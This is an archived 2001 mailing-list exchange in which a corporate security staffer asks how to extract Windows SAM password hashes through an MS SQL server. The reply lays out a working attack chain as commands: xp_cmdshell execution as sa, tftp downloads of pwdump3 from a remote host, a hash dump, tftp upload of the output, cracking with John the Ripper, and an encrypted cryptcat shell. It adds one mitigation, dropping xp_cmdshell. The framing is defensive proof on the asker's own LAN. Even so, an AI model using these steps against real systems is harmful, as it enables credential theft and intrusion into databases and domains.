RE: MS SQL & NT registry

From: Erik Birkholz (
Date: 11/01/01

Message-ID: <>
From: Erik Birkholz <>
To: "'Lynum, David'" <>,
Subject: RE: MS SQL & NT registry
Date: Wed, 31 Oct 2001 17:43:16 -0800


Why not use the xp_cmdshell procedure to run commands? (xp_cmdshell 'nasty

If you are "sa" this will work, if not run 'sp_helprotect' to list
permissions and find out it you have the correct permissions.

Use these commands in the Query Analyzer. You said this is on your
"private" LAN so sniffing shouldn't be an issue.

tftp -i <ip> GET pwdump3.exe pwdump3.exe
tftp -i <ip> GET lsaext.dll lsaext.dll
tftp -i <ip> GET pwservice.exe pwservice.exe
pwdump3 outfile.txt
tftp <ip> PUT outfile.txt outfile.txt
use John the Ripper (or l0pht) to crack

If you need encryption, then upload cryptcat (nc.exe encrypted) and the
pwdump3 files. Fire yourself an encrypted shell. Run the command from
there (pwdump3 Grab the output from the cryptcat window and
paste into a notepad. Then crack away.

That should solve your problem.

Also, tell them to remove the xp_cmdshell extended stored procedure. (use
sp_dropextendedproc 'xp_cmdshell')

Oh yea, tell them to read Chip's site,

                        --Erik B

-----Original Message-----
From: Lynum, David []
Sent: Wednesday, October 31, 2001 12:57 PM
Subject: MS SQL & NT registry

Hey there,

This is first time I've posed a question to this list, so take it easy on

My question has to do with a whitepaper I read from on security
database servers, and here's the link to it, The paper shows how to
use an extended stored procedure call, "xp_regread" to read registry
contents for the SAM\Domains\Accounts section. But it doesn't tell you how
to extract the query results so that a password cracking program such as
L0phtcrack can be used to see the account information. My question is
specifically about extracting the contents of the SAM registry entries from
the SQL query results so that I can import them into L0phtcrack to crack
them. How do I do this? I've saved the query report results to a file and
then opened that file from within L0pht, but L0pht closes as soon as I do
this. I e-mailed support for L0pht and they haven't gotten back to me. I
have L0pht 2.52. Also, I spoke with one of the security people at ISS about
this, but they won't provide any help.

Have any of you done this, or know where I can find information on how to do
this? I need to know because I handle data security for my company and I
have to prove to them that this exploit is real before they'll take any

Thanks in advance for your help,


--This communication and any files transmitted with it contain information
which is confidential and may be privileged and exempt from disclosure under
applicable law. It is intended solely for the use of the individual or
entity to which it is addressed. If you are not the intended recipient, you
are hereby notified that any use, dissemination or copying of this
communication is strictly prohibited. If you have received this
communication in error, please notify the sender. Thank you for your

Relevant Pages